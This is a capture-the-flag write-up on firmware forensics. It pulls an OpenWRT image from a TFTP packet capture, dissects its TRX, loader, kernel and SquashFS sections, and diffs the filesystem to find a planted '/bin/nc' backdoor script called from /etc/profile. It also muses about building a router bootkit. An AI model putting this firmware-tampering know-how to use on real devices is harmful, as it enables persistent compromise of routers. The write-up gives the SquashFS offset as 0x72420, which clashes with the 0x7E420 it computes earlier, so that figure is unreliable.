This challenge description is not very intriguing, so I hired a couple of marketing specialists to <strike>design a new logo</strike> add some Infosec drama and reformulate it:<br />
<br />
<div class="code">
A mysterious bug affected one of the core routers at a major Internet service provider in Syria. The failure of this router caused the whole country to suddenly lose all connection to the Internet. The Syrian government recorded a traffic capture right before the crash and hired you to perform a forensic analysis.</div>
<br />
Download provided: <a href="https://github.com/MarioVilas/write-ups/blob/master/ncn-ctf-2014/Vodka/vodka">https://github.com/MarioVilas/write-ups/blob/master/ncn-ctf-2014/Vodka/vodka</a><br />
<br />
<br />
<b>Network Forensics</b><br />
<br />
The download provided is a packet capture using the PCAP-NG format. Wireshark is too mainstream, so let's <a href="http://pcapng.com/">convert the PCAP-NG to PCAP</a> and open it using <a href="http://www.netresec.com/?page=Networkminer">Network Miner</a>:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTH_rowCasj5POm7DmkZv_QvqocPo9f6lINR__90dm5KSiGhRGwQZZddnFoazeCLc6LJcjw0GPBP4EFTBn0zNo3uISHAI7hAHiXEW-h3hNMQpkSH2JjKNDOV8k7jj43K3PsjxgnkxeX_fm/s1600/tftp1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="247" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhTH_rowCasj5POm7DmkZv_QvqocPo9f6lINR__90dm5KSiGhRGwQZZddnFoazeCLc6LJcjw0GPBP4EFTBn0zNo3uISHAI7hAHiXEW-h3hNMQpkSH2JjKNDOV8k7jj43K3PsjxgnkxeX_fm/s320/tftp1.PNG" width="320" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXP6LXytU1035AkBWz4OQiWBZhog3hLJ2dBsr19ArfkDb2Luu1kAB8n6rM8WaL4XDdvAJofENJ0PISGRb1zbPmEIemTGXUpSg1HpU4t9Wnw8oDoNrw56jJs6VlBt-kLnXCxWhrOVq6gaEe/s1600/tftp2.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="68" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgXP6LXytU1035AkBWz4OQiWBZhog3hLJ2dBsr19ArfkDb2Luu1kAB8n6rM8WaL4XDdvAJofENJ0PISGRb1zbPmEIemTGXUpSg1HpU4t9Wnw8oDoNrw56jJs6VlBt-kLnXCxWhrOVq6gaEe/s640/tftp2.PNG" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Network Miner makes it very easy for us to understand what's going on: there's some sort of file transfer via TFTP and the filename seems to be related to an OpenWRT firmware image.<br />
<b><br /></b>
<b><br /></b>
<b>Firmware structure</b><br />
<br />
We always <a href="https://twitter.com/bernardomr/status/530532003498971136">binwalk all the things</a>, but very few people stop to analyze and understand the firmware structure properly. We know that the firmware image was downloaded using TFTP, a mechanism many routers use to transfer config files and updates, and that it is probably based on the <a href="https://www.openwrt.org/">OpenWRT project</a>.<br />
<br />
So what does binwalk tell us?<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEC6PUPTNNUKbT_9zu8UsKqG47hyOzlUrxa_eNx7A-n6PbNQdc_27av58-JjXeSnWDK7DRNMiygqMfTP80zaGdTFPwJ5z3WFbThZ6vRqvBMikWMGZWXmp66UKGByVpCzR4erOSpSwBJ6R5/s1600/Screenshot-Terminal.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhEC6PUPTNNUKbT_9zu8UsKqG47hyOzlUrxa_eNx7A-n6PbNQdc_27av58-JjXeSnWDK7DRNMiygqMfTP80zaGdTFPwJ5z3WFbThZ6vRqvBMikWMGZWXmp66UKGByVpCzR4erOSpSwBJ6R5/s1600/Screenshot-Terminal.png" width="640" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEiQG2pTJZBeQbdwqBRa_Gdv9U5E9VlFWq-8ujHpALfA938WCO8-nTsoXYj6HY9PduNQpzf6gDD2_sxShKE_HhME8z9YVHMZ1o3jA_kvS51ayxAIqq-77HItvLtFxR0j46wybi55cKORgk/s1600/firm.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="107" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjEiQG2pTJZBeQbdwqBRa_Gdv9U5E9VlFWq-8ujHpALfA938WCO8-nTsoXYj6HY9PduNQpzf6gDD2_sxShKE_HhME8z9YVHMZ1o3jA_kvS51ayxAIqq-77HItvLtFxR0j46wybi55cKORgk/s1600/firm.PNG" width="640" /></a></div>
<br />
The <a href="http://wiki.openwrt.org/doc/techref/bootloader/cfe">Common Firmware Environment</a> (CFE) is a firmware interface/bootloader present on Broadcom SoCs. It is analogous to the BIOS on PC platforms and is responsible for CPU initialization and bootstrap code on embedded processors. The CFE is also referred to as PMON and is generally mapped to <a href="https://en.wikipedia.org/wiki/Memory_Technology_Device">mtd0</a>.<br />
<br />
The JFFS2/NVRAM partition is the non-volatile storage: it holds all the configuration parameters, including router settings, passwords and logs.<br />
<br />
Bear in mind that firmware updates generally do not include the CFE/NVRAM partitions. You can access the CFE console over serial, and you can also dump these partitions on a live system using dd or via <a href="http://goodfet.sourceforge.net/apps/spi/">SPI</a>. Let's focus on the firmware sections included in the provided image (openwrt-wrtsl54gs-squashfs.bin):<br />
<b><br /></b>
<b>TRX (Offset 0x20)</b><br />
<br />
The TRX header is just an encapsulation that describes the firmware image: its size, CRC, flags, version information and partition offsets. Binwalk wasn't recognizing the header and the relative offsets properly, so I submitted <a href="https://github.com/devttys0/binwalk/pull/106">these</a> <a href="https://github.com/devttys0/binwalk/pull/107">two</a> pull requests. Creating <a href="https://github.com/devttys0/binwalk/wiki/Creating-Custom-Signatures">custom signatures</a> for binwalk is pretty straightforward.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQv38k6SfsXTPwNh7v3jEzCaPHvL8iN2obySLo9DIKOTGdL-51sMC5wk4fheoUVT6JTF7kQgn2b_ccLNmhadJ0riv78HOjl-F2co-zV9n9HBFtxrwpWERHF5xnB2Il0PIInEbUlxf_Pr6n/s1600/Screenshot-Terminal-00.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="155" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiQv38k6SfsXTPwNh7v3jEzCaPHvL8iN2obySLo9DIKOTGdL-51sMC5wk4fheoUVT6JTF7kQgn2b_ccLNmhadJ0riv78HOjl-F2co-zV9n9HBFtxrwpWERHF5xnB2Il0PIInEbUlxf_Pr6n/s1600/Screenshot-Terminal-00.png" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Some firmwares (like the newer ones from ASUS and Netgear) use this TRX structure but don't include a loader; in that case the Linux Kernel and the RootFS offsets are shifted accordingly.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho7oJ3iG5DS5u0YABisqrhK1pkycuXA8AQO5KC4lodaOtdNBd0tWi4jcz-07jOZVLf9OeMpdEeDIYUyw7E_Wmf3S2K9geT3WE_UvMBSnCVWM0q4E824jUhdAV_ACKFB-n4YYHgaVKXugGn/s1600/trx-loader.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="226" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEho7oJ3iG5DS5u0YABisqrhK1pkycuXA8AQO5KC4lodaOtdNBd0tWi4jcz-07jOZVLf9OeMpdEeDIYUyw7E_Wmf3S2K9geT3WE_UvMBSnCVWM0q4E824jUhdAV_ACKFB-n4YYHgaVKXugGn/s1600/trx-loader.png" width="400" /></a></div>
<br />
If the firmware includes any extra header before the TRX, you have to add its size to the displayed partition offsets in order to find the real values. Many SOHO router firmwares out there don't include one, so the displayed values are correct in most cases. The downloaded OpenWRT image had the following offsets:<br />
<br />
<ul>
<li>Loader: 0x20 + 0x1C = 0x3C</li>
<li>Kernel: 0x20 + 0x8D8 = 0x8F8</li>
<li>RootFS: 0x20 + 0x7E400 = 0x7E420</li>
</ul>
<br />
In this specific case, we have a <a href="http://wiki.openwrt.org/doc/techref/header">BinHeader</a> right before the TRX, indicating the board ID, the FW Date and the Hardware Date. The struct is described in <a href="https://github.com/mirror/dd-wrt/blob/master/src/include.v24/cyutils.h">cyutils.h</a>:<br />
<br />
<script src="https://gist.github.com/bmaia/3feab2fe6234a1e59deb.js"></script>
This extra header appears on a few routers like the WRT54G series: the Web GUI checks for this pattern before actually writing the firmware.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTdgLcFPozvGmcfmCyfR4LYbFq0dwL89n71gKH1bGNZFtIwxDlYK2YY9dw5Rmo2KNMyYt_SNoi_XJj2sqxx5lkpHrsgw7sI7Z9Yx93zDFHfcRCmWRAHd1qdMm7xmN99593Yzq0PINrA1ND/s1600/hex.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em; text-align: center;"><img border="0" height="146" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTdgLcFPozvGmcfmCyfR4LYbFq0dwL89n71gKH1bGNZFtIwxDlYK2YY9dw5Rmo2KNMyYt_SNoi_XJj2sqxx5lkpHrsgw7sI7Z9Yx93zDFHfcRCmWRAHd1qdMm7xmN99593Yzq0PINrA1ND/s1600/hex.PNG" width="640" /></a><br />
<br />
We are particularly interested in the fwdate field (Firmware Date), composed of the hex bytes 07 02 03. According to <a href="https://dev.openwrt.org/browser/trunk/tools/firmware-utils/src/addpattern.c">addpattern.c</a>, the first byte defines the year, the second one the month and the third byte the day the firmware was created. The fwdate seems to be 03-February-2007; save that for later, we will need it =)<br />
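<br />
As an added example (not code from the post, nor from binwalk or the firmware tools it links), here is a Python parser that applies the rule above: it locates the TRX, adds the 0x20-byte BinHeader size to the partition offsets, decodes the fwdate bytes and checks the TRX CRC. The BinHeader field layout, the CRC convention and the sample image bytes are my assumptions, noted in the code.<br />
<br />
```python
"""Parse a WRT54G-style image: 0x20-byte BinHeader, TRX header, partitions.
Assumptions (mine, not the post's): the BinHeader layout is my reading of
cyutils.h (magic[4], res1[4], fwdate[3], fwvern[3], id[4], hw_ver, ...), and
the TRX CRC is CRC-32 seeded with 0xFFFFFFFF and no final inversion, taken
from the flags/version word to the end of the image (OpenWrt trx tool style).
"""
import struct
import zlib
from dataclasses import dataclass

BINHEADER_SIZE = 0x20        # sizeof(struct code_header)
TRX_MAGIC = b"HDR0"
TRX_HEADER_SIZE = 0x1C       # magic, len, crc32, flags/version, 3 offsets
TRX_CRC_START = 12           # CRC covers everything after the crc32 field
PARTITION_NAMES = ("loader", "kernel", "rootfs")


@dataclass
class BinHeader:
    magic: bytes
    fwdate: str        # ISO date decoded from the three fwdate bytes
    fwver: bytes
    board_id: bytes
    hw_ver: int


@dataclass
class TrxHeader:
    length: int        # total TRX length, header included
    crc32: int
    flags: int
    version: int
    offsets: tuple     # partition offsets relative to the TRX start


def parse_binheader(blob: bytes, base: int = 0) -> BinHeader:
    magic, fwdate, fwver, board_id, hw_ver = struct.unpack_from(
        "<4s4x3s3s4sB", blob, base)
    year, month, day = fwdate   # addpattern.c: year-2000, month, day
    return BinHeader(magic, f"{2000 + year:04d}-{month:02d}-{day:02d}",
                     fwver, board_id, hw_ver)


def parse_trx(blob: bytes, base: int) -> TrxHeader:
    magic, length, crc, flags, version, o0, o1, o2 = struct.unpack_from(
        "<4sIIHHIII", blob, base)
    if magic != TRX_MAGIC:
        raise ValueError(f"no TRX magic at 0x{base:X}")
    if base + length > len(blob):
        raise ValueError("TRX length field runs past the end of the image")
    return TrxHeader(length, crc, flags, version, (o0, o1, o2))


def find_trx(blob: bytes) -> int:
    """TRX start: 0 for a bare TRX, 0x20 when a BinHeader precedes it."""
    for candidate in (0, BINHEADER_SIZE):
        if blob[candidate:candidate + 4] == TRX_MAGIC:
            return candidate
    raise ValueError("TRX header not found at 0x0 or 0x20")


def trx_crc_ok(blob: bytes, base: int, hdr: TrxHeader) -> bool:
    data = blob[base + TRX_CRC_START:base + hdr.length]
    computed = ~zlib.crc32(data) & 0xFFFFFFFF   # undo zlib's final inversion
    return computed == hdr.crc32


def absolute_offsets(base: int, hdr: TrxHeader) -> dict:
    """Add the size of whatever precedes the TRX to each non-zero offset."""
    return {name: base + off
            for name, off in zip(PARTITION_NAMES, hdr.offsets) if off}


def analyse(blob: bytes) -> dict:
    base = find_trx(blob)
    hdr = parse_trx(blob, base)
    result = {"trx_base": base,
              "crc_ok": trx_crc_ok(blob, base, hdr),
              "partitions": absolute_offsets(base, hdr)}
    if base == BINHEADER_SIZE:
        result["fwdate"] = parse_binheader(blob).fwdate
    return result


def build_sample_image() -> bytes:
    """Constructed image: BinHeader dated 2007-02-03 in front of a TRX whose
    partition offsets match the ones quoted for the challenge file."""
    binheader = struct.pack("<4s4s3s3s4sB", b"W54U", b"\0" * 4,
                            b"\x07\x02\x03", b"\0\0\x01", b"U2ND", 0)
    binheader = binheader.ljust(BINHEADER_SIZE, b"\0")
    offsets = (0x1C, 0x8D8, 0x7E400)
    body = bytearray(0x7E500 - TRX_HEADER_SIZE)          # zero-filled payload
    kern, root = (o - TRX_HEADER_SIZE for o in offsets[1:])
    body[kern:kern + 6] = b"KERNEL"                       # placeholder kernel
    body[root:root + 4] = b"hsqs"                         # SquashFS LE magic
    tail = struct.pack("<HHIII", 0, 1, *offsets) + bytes(body)
    crc = ~zlib.crc32(tail) & 0xFFFFFFFF
    return binheader + struct.pack("<4sII", TRX_MAGIC, len(tail) + 12, crc) + tail
```
<br />
Running analyse() on a real dump gives you the absolute offsets to feed to dd before you bother binwalk, and a failed CRC check is the first hint that the image was edited by hand rather than produced by the build tools.<br />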
<br />
<b>GZ'd LZMA Loader (Offset 0x3C)</b><br />
<br />
According to <a href="http://wiki.openwrt.org/doc/techref/flash.layout">OpenWRT Wiki</a>, the boot loader has no concept of filesystems: it assumes that the start of the TRX data section is executable code.<br />
<br />
The boot loader boots into an LZMA program which decompresses the kernel into RAM and executes it. It turns out the boot loader does know gzip compression, so we have a gzip-compressed LZMA decompression program at 0x3C.<br />
<br />
You can find the source code for this <a href="https://dev.openwrt.org/browser/trunk/target/linux/brcm-2.4/image/lzma-loader/src?rev=11275">lzma-loader here</a> and <a href="https://downloads.openwrt.org/sources/loader-0.04.tar.gz">here</a>. Note the <a href="https://dev.openwrt.org/browser/trunk/target/linux/brcm-2.4/image/lzma-loader/src/Makefile?rev=11275">TEXT_START offset</a> at 0x80001000: we may need to adjust the loading address in our disassembler in order to reverse the compiled loader. Don't forget to decompress it (gunzip) before reversing the file.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix07sEQIiFzR70zx55_Pn0msP6LWvN3h0XMG19Tq4eQ28qxH6L4YUFUi88VLLjADrykdYJ1E2eSr4GzdmW-Y4_3h7RVhQQ4ADTMIrutItRFYzZdwhHJpKM8SG5dwFY5eQoiuEnfU71rgid/s1600/offset.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEix07sEQIiFzR70zx55_Pn0msP6LWvN3h0XMG19Tq4eQ28qxH6L4YUFUi88VLLjADrykdYJ1E2eSr4GzdmW-Y4_3h7RVhQQ4ADTMIrutItRFYzZdwhHJpKM8SG5dwFY5eQoiuEnfU71rgid/s1600/offset.PNG" width="155" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF0V_M-RdeZ6cN0S9bWqR_3p8z7rNSr3GRHP9qZzB6n-JeA49Ub-qykEN2RxPkyRwBFw1q3cNzQv2IxW1dRZnPHiRrFp4El0KMwQmaNg8S6rKSbKWs7MLUaooRjckacJIL8sA1c_1ihcic/s1600/1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="265" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgF0V_M-RdeZ6cN0S9bWqR_3p8z7rNSr3GRHP9qZzB6n-JeA49Ub-qykEN2RxPkyRwBFw1q3cNzQv2IxW1dRZnPHiRrFp4El0KMwQmaNg8S6rKSbKWs7MLUaooRjckacJIL8sA1c_1ihcic/s1600/1.PNG" width="400" /></a></div>
<br />
Most embedded toolchains strip the binaries in order to reduce the firmware size. If you want to reverse a friendlier version of the loader, grab the latest <a href="https://downloads.openwrt.org/barrier_breaker/14.07/brcm47xx/generic/OpenWrt-ImageBuilder-brcm47xx_generic-for-linux-x86_64.tar.bz2">OpenWRT ImageBuilder</a> and search for loader.elf:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiISyBlqiB_IbmyxsGvl1nxCVga1DcEND95dj3mDyGYt65w3yXMnggLcqr-CuZdiiKzCkdZ_W8hjuLMBAABDoFRms7zjS5zpDDmZWmqsK_MqAldjcPw9gWFqYj6Gqx5bV2wv-oGSteDP1B/s1600/Screenshot-Terminal-4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="245" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiiISyBlqiB_IbmyxsGvl1nxCVga1DcEND95dj3mDyGYt65w3yXMnggLcqr-CuZdiiKzCkdZ_W8hjuLMBAABDoFRms7zjS5zpDDmZWmqsK_MqAldjcPw9gWFqYj6Gqx5bV2wv-oGSteDP1B/s1600/Screenshot-Terminal-4.png" width="400" /></a></div>
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkUlTDRvaD3LwEsbsAyqaQF4b34nnJYL5WHaluHpJ1hWU1YjYdkvZSkvr31r4HMHu02jixlzbFmLF8Rsmj78bYx_L_0tSPwz4COR-gfWZ_cgJBBDJ0YbaVzy-ytAdSgRUGapbj6qy8Sts/s1600/2.PNG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="257" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjnkUlTDRvaD3LwEsbsAyqaQF4b34nnJYL5WHaluHpJ1hWU1YjYdkvZSkvr31r4HMHu02jixlzbFmLF8Rsmj78bYx_L_0tSPwz4COR-gfWZ_cgJBBDJ0YbaVzy-ytAdSgRUGapbj6qy8Sts/s1600/2.PNG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Woohoo, blue code =)</td></tr>
</tbody></table>
<br />
Note that if we modified the loader to include a backdoor, we would have our very own Router <a href="https://en.wikipedia.org/wiki/Rootkit#Bootkits">Bootkit</a>. Cool, isn't it?<br />
<br />
<b>LZMA'd Kernel (Offset 0x8F8)</b><br />
<br />
Instead of just putting a kernel directly onto flash, most embedded devices compress the kernel using LZMA. The boot loader boots into an LZMA program which decompresses the kernel into RAM and executes it.<br />
<br />
Binwalk has a <a href="https://github.com/devttys0/binwalk/blob/5404839534c9ea6000f85d13664d84a19418fa11/src/binwalk/magic/linux">signature</a> to find Kernel strings in raw Linux Kernels. The identified string lists the toolchain used to compile the Kernel, as well as the compiled date and version information:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBYZl6kdrFyrONTwKRp-qbxLK5b8cGzljaSezZkD1wHl64S_pwvvnFIMCOgweRQt4w8PDNH_0PkyPKTVcNUoxeikDlbJEOL3XBaVYzenIf1J-LPPM04fnmp9DyIrW-r9OpWIWD3KKq5UrO/s1600/Screenshot-Terminal-5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="116" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiBYZl6kdrFyrONTwKRp-qbxLK5b8cGzljaSezZkD1wHl64S_pwvvnFIMCOgweRQt4w8PDNH_0PkyPKTVcNUoxeikDlbJEOL3XBaVYzenIf1J-LPPM04fnmp9DyIrW-r9OpWIWD3KKq5UrO/s1600/Screenshot-Terminal-5.png" width="400" /></a></div>
<br />
And why did binwalk manage to find all this information in the Kernel? The answer can be found in the <a href="https://dev.openwrt.org/browser/branches/whiterussian/openwrt/toolchain/gcc/Makefile#L82">toolchain's Makefile</a>:<br />
<br />
<script src="https://gist.github.com/bmaia/154fb3df62ebd1947a9b.js"></script>
If we follow the steps from my <a href="http://w00tsec.blogspot.com.br/2014/02/analyzing-malware-for-embedded-devices.html">previous post</a> we can build a customized Kernel for OpenWRT. The generated <a href="https://en.wikipedia.org/wiki/Vmlinux">vmlinux</a> is generally an ELF file, but in our case, the object was <a href="https://dev.openwrt.org/browser/branches/whiterussian/openwrt/target/linux/linux-2.4/Makefile#L349">stripped using objcopy</a>:<br />
<br />
<script src="https://gist.github.com/bmaia/3dd9d0579bf9b967e3a8.js"></script>
Did you notice the compile date was 03-February-2007? Let's save that for later as well.<br />
<br />
<b>SquashFS (Offset 0x72420)</b><br />
<br />
The last part is the actual filesystem. Most embedded Linux devices use SquashFS, and many vendors hack it in order to get better compression and faster performance. Fortunately we don't have to worry about that, as <a href="http://www.devttys0.com/2014/08/mucking-about-with-squashfs/">Sasquatch</a> handles different SquashFS header/compression formats.<br />
<br />
The filesystem has the standard OpenWRT directories and files, including a banner from the 0.9 build (White Russian).<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMyWQ31DXT1cGlolYuzbfrWe7P7-BDDWtcyPc-blKajltp8uPM4XwYSJw3Ycul8Z83umCwbfsblq4gnGhyphenhypheneEACwdiwcSas5hT0cXHnEzjCJblzrbO42waoWa8UAVj85KZc9j1mx9nuFsYn/s1600/Screenshot-Terminal-7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="157" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhMyWQ31DXT1cGlolYuzbfrWe7P7-BDDWtcyPc-blKajltp8uPM4XwYSJw3Ycul8Z83umCwbfsblq4gnGhyphenhypheneEACwdiwcSas5hT0cXHnEzjCJblzrbO42waoWa8UAVj85KZc9j1mx9nuFsYn/s1600/Screenshot-Terminal-7.png" width="400" /></a></div>
<br />
Both binwalk and sasquatch display the SquashFS superblock information, including the creation/last append time:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIxpwcCyaHoAKcV222zUibMkJEe1T808991a5mFQBW_gAuP1ySlD5Jv3h63Ad2sXUFWRRZBDSyjwIF8IJ8zDsX4ndjtou1e5qQg3z21x61bAzV2waS9hA-3n0xs2YZlcsArDbdsHu2clYy/s1600/Screenshot-Terminal-6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="253" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiIxpwcCyaHoAKcV222zUibMkJEe1T808991a5mFQBW_gAuP1ySlD5Jv3h63Ad2sXUFWRRZBDSyjwIF8IJ8zDsX4ndjtou1e5qQg3z21x61bAzV2waS9hA-3n0xs2YZlcsArDbdsHu2clYy/s1600/Screenshot-Terminal-6.png" width="400" /></a></div>
<br />
Did you spot the date 29-October-2014? There's definitely something going on here =)<br />
<br />
<b style="text-align: center;"><br /></b>
<b style="text-align: center;">Directory Tree Diff & Fuzzy Hashing</b><br />
<br />
Now that we have unpacked & unsquashed the firmware, let's use <a href="https://github.com/bmaia/binwally">binwally</a> to compare the directory tree and find the needle in the haystack.<br />
<br />
After googling the filename (openwrt-wrtsl54gs-squashfs.bin), we get three possible candidates:<br />
<br />
- <a href="https://downloads.openwrt.org/whiterussian/0.9/default/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/default/openwrt-wrtsl54gs-squashfs.bin</a><br />
- <a href="https://downloads.openwrt.org/whiterussian/0.9/micro/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/micro/openwrt-wrtsl54gs-squashfs.bin</a><br />
- <a href="https://downloads.openwrt.org/whiterussian/0.9/pptp/openwrt-wrtsl54gs-squashfs.bin">https://downloads.openwrt.org/whiterussian/0.9/pptp/openwrt-wrtsl54gs-squashfs.bin</a><br />
<br />
OpenWRT offers different builds for the same device because of constraints like limited flash size. Let's download these three candidates, unpack and compare them:<br />
<br />
<div class="code">
binwally.py ctf/_openwrt-wrtsl54gs-squashfs.bin.extracted/ micro/_openwrt-wrtsl54gs-squashfs.bin.extracted/</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1kZP32c2OWTTQCRvCZhj6IHkrd6rzpzEf3XTVdOcYoAcaOkbygufFMS9viS3ptb066LDsUGb0ZBAGCThg5RaYy8-ZGPCz68kfryc4F0Pi_qrHApzFH2I8PO5hAOV4tqjRzdZbSuAQQWuV/s1600/binwally.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="170" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi1kZP32c2OWTTQCRvCZhj6IHkrd6rzpzEf3XTVdOcYoAcaOkbygufFMS9viS3ptb066LDsUGb0ZBAGCThg5RaYy8-ZGPCz68kfryc4F0Pi_qrHApzFH2I8PO5hAOV4tqjRzdZbSuAQQWuV/s1600/binwally.png" width="400" /></a></div>
<br />
The "micro" build has the highest overall match score (99%), so let's spot the differences:<br />
<br />
<div class="code">
binwally.py ctf/_openwrt-wrtsl54gs-squashfs.bin.extracted/ micro/_openwrt-wrtsl54gs-squashfs.bin.extracted/ | grep -E -v "ignored|matches"</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_YcFKeXUDBZkPSDp8qhkbmXgf-D7HnlFF9cZpSHLEmHaDEzjw65rssZOINU2Kq9j8Rrxq2QDwD_fnmB5eQ4xqNYxUGaJjfLzFsAXCcv2lDg3sN1Bip3-0jDCKfz7L8Nf2-WJRhDWwulA8/s1600/binwally2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="138" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh_YcFKeXUDBZkPSDp8qhkbmXgf-D7HnlFF9cZpSHLEmHaDEzjw65rssZOINU2Kq9j8Rrxq2QDwD_fnmB5eQ4xqNYxUGaJjfLzFsAXCcv2lDg3sN1Bip3-0jDCKfz7L8Nf2-WJRhDWwulA8/s1600/binwally2.png" width="400" /></a></div>
<br />
After carefully reviewing these files, we notice that the "/etc/profile" was modified to include a call to the nc backdoor.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCipxQ9NmfTAuPLmaefxl1rKcd78rg7qY2jZPeP3zGsytZk4-Rs7tGgXj4ZosSwCOej71-rTCrVZD95QUZQaiPDq1DStSc8XwB41F61ds10CWOLmIDN466ZcA_M4uH_ypoWaD8vA1xnWfB/s1600/diff.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="77" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjCipxQ9NmfTAuPLmaefxl1rKcd78rg7qY2jZPeP3zGsytZk4-Rs7tGgXj4ZosSwCOej71-rTCrVZD95QUZQaiPDq1DStSc8XwB41F61ds10CWOLmIDN466ZcA_M4uH_ypoWaD8vA1xnWfB/s1600/diff.png" width="400" /></a></div>
<br />
The LZMA'd Kernel (offset 0x8F8) is the same on both images, even though binwally reports a difference. This happens because binwalk's extraction doesn't know where the kernel ends, so both extracted files also contain the data that follows it, such as the SquashFS partition.<br />
<br />
The backdoor located at "/bin/nc" is a simple bash script that checks the MD5 of "/etc/profile" and draws a Nyan Cat along with the challenge key. In order to get the proper key, we simply change the file location in the script to the relative path "./etc/banner", so it does not clash with the file on our own system.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgecj7RzwWsJcZcx0EmUT7uNfViQCuSRPsMtH9TQAVyMb3evyyPj5m0eWKEazPWUmmi2tdeRwFFx07PM10XNHNg84RdCX_fHBFjNJRtEWErJjShWMOuTTxRXLgIlQewqfEQazA6mvvLo2PV/s1600/backdoor.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="188" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgecj7RzwWsJcZcx0EmUT7uNfViQCuSRPsMtH9TQAVyMb3evyyPj5m0eWKEazPWUmmi2tdeRwFFx07PM10XNHNg84RdCX_fHBFjNJRtEWErJjShWMOuTTxRXLgIlQewqfEQazA6mvvLo2PV/s1600/backdoor.png" width="400" /></a></div>
<br />
After running the file, we get the key NCNdeadb6adec4c77a40c23e04770924d3c5b18face.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
